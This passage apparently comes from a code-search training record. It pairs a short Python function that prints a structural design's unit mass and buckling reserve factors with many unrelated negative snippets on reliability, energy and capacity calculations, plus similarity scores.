1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 
1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: [1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n 
_diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = (attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def ComputeEAvailable(self):\r\n pass", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def 
test_getThermalExpansionFactorConservedMassByLinearExpansionPercent(self):\n hotTemp = 700.0\n dLL = self.component.material.linearExpansionFactor(\n Tc=hotTemp, T0=self._coldTemp\n )\n ref = 1.0 + dLL\n cur = self.component.getThermalExpansionFactor(Tc=hotTemp)\n self.assertAlmostEqual(cur, ref)", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 0", "def convergence_check(self):\n air = self.air_alias.val\n flue_gas = self.fuel_alias.val + '_fg'\n fuel = self.fuel_alias.val\n\n for c in self.outl:\n if not c.fluid.val_set[air]:\n if c.fluid.val[air] > 0.95:\n c.fluid.val[air] = 0.95\n if c.fluid.val[air] < 0.5:\n c.fluid.val[air] = 0.5\n\n if not c.fluid.val_set[flue_gas]:\n if c.fluid.val[flue_gas] > 0.5:\n c.fluid.val[flue_gas] = 0.5\n if c.fluid.val[flue_gas] < 0.05:\n c.fluid.val[flue_gas] = 0.05\n\n if not c.fluid.val_set[fuel]:\n if c.fluid.val[fuel] > 0:\n c.fluid.val[fuel] = 0\n\n c.target.propagate_fluid_to_target(c, c.target)\n\n for i in self.inl:\n if i.m.val_SI < 0 and not i.m.val_set:\n i.m.val_SI = 0.01\n\n for c in self.outl:\n if c.m.val_SI < 0 and not c.m.val_set:\n c.m.val_SI = 10\n c.target.propagate_fluid_to_target(c, c.target)\n\n if self.lamb.val < 1 and not self.lamb.is_set:\n self.lamb.val = 2", "def measure_allocation_diversity_bounds_errors(self, slots_assegnation_probabilities, LP_news_pool, iter=5000):\n for tech in [\"rand_1\", \"rand_2\", \"rand_3\"]:\n max_errors_per_iter = []\n for k in range(iter):\n tmp_slots_assegnation_probabilities = []\n for elem in slots_assegnation_probabilities:\n tmp_slots_assegnation_probabilities.append(elem.copy())\n constraints_error = [0] * len(self.categories)\n promenance_per_category = [0] * len(self.categories)\n result = self.__de_randomize_LP(LP_news_pool, tmp_slots_assegnation_probabilities, tech)\n for i in range(len(result)):\n category_index = self.categories.index(result[i].news_category)\n promenance_per_category[category_index] += self.real_slot_promenances[i]\n\n for i in range(len(promenance_per_category)):\n if promenance_per_category[i] < self.B[i] * -1:\n constraints_error[i] += (self.B[i] * -1 - promenance_per_category[i]) / (self.B[i] * -1)\n\n max_errors_per_iter.append(np.mean(constraints_error))\n if tech == \"rand_1\":\n self.rand_1_errors += max_errors_per_iter\n elif tech == \"rand_2\":\n self.rand_2_errors += max_errors_per_iter\n else:\n self.rand_3_errors += max_errors_per_iter", "def cost(self):\n lg = len(self.guarantees.cnf)\n la = len(self.assumptions.cnf)\n\n \"\"\"heuristic\n Low: guarantees while assuming little (assumption set is bigger)\n High: guarantees while assuming a lot (assumption set is smaller)\"\"\"\n\n return la / lg", "def sum_availability(val, quant) -> float:\n return val + qty_available(quant)", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * 
desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def erfc(x):\n return 0.0", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def load_factor(self):\n return round(self._n / self._size, 2)", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n 
self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def balanceFactor(self):\n leftHeight = self.left.height if self.left != None else 0\n rightHeight = self.right.height if self.right != None else 0\n return rightHeight - leftHeight", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def bcRange(self):\n\t\treturn fabs(self.Upper - self.Lower)", "def get_expected_cost(self):", "def calculate_br_down_metric(br_down):\n if br_down < 1:\n br_down = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_down) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def test_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def _get_new_capacity(self):\n for prime in primes:\n if prime > 2 * self.size:\n return prime\n raise ValueError(\"Error: Table size overflow!\")", "def load_factor_d(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Get day with maximum demand (in percentage of year)\n peak_d_demand = self.fuels_peak_d\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n average_demand = np.sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n\n if average_demand != 0:\n lf_d[k] = average_demand / peak_d_demand[k] # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def calc_electric_diesel_reduction (self):\n gen_eff = self.cd[\"diesel generation efficiency\"]\n\n self.electric_diesel_reduction = self.net_generation_wind / gen_eff\n\n electric_diesel = self.generation/gen_eff\n if self.electric_diesel_reduction > electric_diesel:\n self.electric_diesel_reduction = electric_diesel", "def calc_GT_operation_partload(wdot_W, gt_size_W, eta0, m0_exhaust_from_GT_kgpers, fuel_type):\n assert wdot_W <= gt_size_W\n\n if fuel_type == 'NG':\n exitT = CC_EXIT_T_NG\n LHV = LHV_NG\n else:\n exitT = CC_EXIT_T_BG\n LHV = LHV_BG\n\n part_load_factor = (wdot_W + 1) / gt_size_W # avoid calculation errors # TODO: reference?\n if part_load_factor < GT_MIN_PART_LOAD:\n raise ValueError('The load (', wdot_W, ')is lower than minimum part load (', gt_size_W * GT_MIN_PART_LOAD, ').')\n\n eta = (0.4089 + 0.9624 * part_load_factor - 0.3726 * part_load_factor ** 2) * eta0 # (4.12) [C. Weber, 2008]_\n # mdot = (0.9934 + 0.0066 * part_load_factor) * mdot0\n T_exhaust_GT_K = (0.7379 + 0.2621 * part_load_factor) * exitT # (4.14) [C. 
Weber, 2008]_\n m_fuel_kgpers = wdot_W / (eta * LHV)\n\n if fuel_type == 'NG':\n m_exhaust_GT_kgpers = (103.7 * 44E-3 + 196.2 * 18E-3 + 761.4 * 28E-3 + 200.5 * 32E-3 * (CC_AIRRATIO - 1) +\n 200.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 1.8156 # TODO: reference?\n\n else:\n m_exhaust_GT_kgpers = (98.5 * 44E-3 + 116 * 18E-3 + 436.8 * 28E-3 + 115.5 * 32E-3 * (CC_AIRRATIO - 1) + \\\n 115.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 2.754 # TODO: reference?\n\n return eta, m_exhaust_GT_kgpers, T_exhaust_GT_K, m_fuel_kgpers", "def calculate_risk_tol(*args):\n global total_score\n risk_tol_start = 0.0\n\n for risk_per_pg in risk_tol_per_qs.iterkeys():\n try:\n risk_tol_start = risk_tol_start + risk_tol_per_qs[risk_per_pg][-1] # this is the last item in the list of each information in the page\n except IndexError:\n pass\n total_score = risk_tol_start", "def err_func(x,rv,valore,specn,lcrop,models='da2014'):\n tmp = tmp_func(x[0], x[1], rv, specn, lcrop, models)\n if tmp != 1: return abs(tmp[3]-(valore+1.)) #this is quantity that gets minimized \n else: return 1E30", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def real_reduce(self, bound, large_constant):\n approximation_matrix = self.generate_approximation_matrix(large_constant)\n LLL_matrix = self.generate_LLL_matrix(approximation_matrix)\n GS_matrix = self.generate_GS_matrix(LLL_matrix) \n minimal_vector_bound = self.calculate_minimal_vector_bound(large_constant, LLL_matrix, GS_matrix)\n S, T = self.calculate_S_and_T(self.coefficients[\"Z_bounds\"])\n print('ST',T**2 + S)\n new_bound = self.real_reduce_new_bound(large_constant, minimal_vector_bound, S, T)\n print('diff_bound',new_bound)\n return new_bound", "def single_center_de_needs(servers: int, DE_capacity: int) -> int:\n\n return math.ceil(servers / DE_capacity)", "def gss(self,LB,UB,tol,itr):\n \n GoldenRatio = (math.sqrt(5) + 1) / 2\n \n iterations=0\n gss=[]\n gss_x=[LB,UB]\n \n c = UB - (UB - LB) / GoldenRatio\n d = LB + (UB - LB) / GoldenRatio\n while abs(UB - LB) > tol and iterations < itr:\n if self.Func(c) < self.Func(d):\n UB = d\n gss_x.append(UB)\n iterations+=1\n else:\n LB = c\n \n gss_x.append(LB)\n iterations+=1\n c = UB - (UB - LB) / GoldenRatio\n d = LB + (UB - LB) / GoldenRatio\n \n \n #print(\" best at %.15f\"% ((UB + LB)/2) , \"itr = \",iterations)\n gss.append(gss_x)\n gss.append((LB+UB)/2)\n gss.append(iterations)\n \n return gss", "def bottles_required(beer_recipe):\r\n bottles_demanded = upcoming_future_prediction(beer_recipe)\r\n bottles_ready = delivery_information[beer_recipe]\r\n if bottles_ready > bottles_demanded:\r\n bottles_needed = 0\r\n else:\r\n bottles_needed = bottles_demanded - bottles_ready\r\n return int(bottles_demanded), bottles_ready, int(bottles_needed)" ]
[ "0.5978814", "0.58166504", "0.57432806", "0.5645041", "0.56362903", "0.5612008", "0.56099224", "0.55491924", "0.55470383", "0.55240196", "0.55133814", "0.5455415", "0.5440525", "0.5410518", "0.54084057", "0.54057515", "0.53936213", "0.5387816", "0.53826976", "0.5381602", "0.5380707", "0.53788155", "0.5361831", "0.5352453", "0.5351108", "0.53442925", "0.5342924", "0.5335802", "0.5322661", "0.530402", "0.5303664", "0.530347", "0.5297434", "0.5293838", "0.5282413", "0.5255263", "0.5252825", "0.524803", "0.52473193", "0.52371544", "0.5229624", "0.5228288", "0.522574", "0.52226675", "0.52146053", "0.52080464", "0.5207208", "0.52047914", "0.5200887", "0.5191351", "0.5188143", "0.5186163", "0.5175419", "0.5172129", "0.5171992", "0.51683956", "0.5164187", "0.51630235", "0.51609766", "0.5148888", "0.5144369", "0.5138755", "0.513478", "0.512983", "0.51272815", "0.51267266", "0.511937", "0.51141244", "0.5110717", "0.50937605", "0.5093549", "0.5083582", "0.5080394", "0.50765574", "0.507605", "0.50646925", "0.5060488", "0.505711", "0.5040375", "0.5033611", "0.50285846", "0.5019012", "0.50114226", "0.5009145", "0.50022846", "0.49942455", "0.49872074", "0.49831644", "0.49805102", "0.49802208", "0.49756026", "0.49747667", "0.49720865", "0.49628016", "0.4957792", "0.4949948", "0.49492633", "0.4948299", "0.49476707", "0.49402002" ]
0.555809
7
This function allows a set of dimensions to be tested, printing the key information (unit mass and each reserve factor) as a result.
def tester(dim):
    print("Unit Mass: " + str(mass(dim)))
    print("Skin Buckle RSF: " + str(skinBuckle(dim)+1))
    print("Stiffener Buckle RSF: " + str(stiffenerBuckle(dim)+1))
    print("Mat Fail RSF: " + str(matFail(dim)+1.1))
    print("Euler Fail RSF: " + str(eulerBuckle(dim)+1.1))
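A sketch of how tester might be driven, assuming the sizing helpers it prints (mass, skinBuckle, stiffenerBuckle, matFail, eulerBuckle) are defined in the same module as above; the trial dimension values are hypothetical placeholders.

# dim = [bst, tst, tsk] -- stiffener height, stiffener thickness, skin thickness
candidate = [0.030, 0.002, 0.0015]  # hypothetical trial sizing
tester(candidate)                   # prints the unit mass plus the four reserve factors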
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
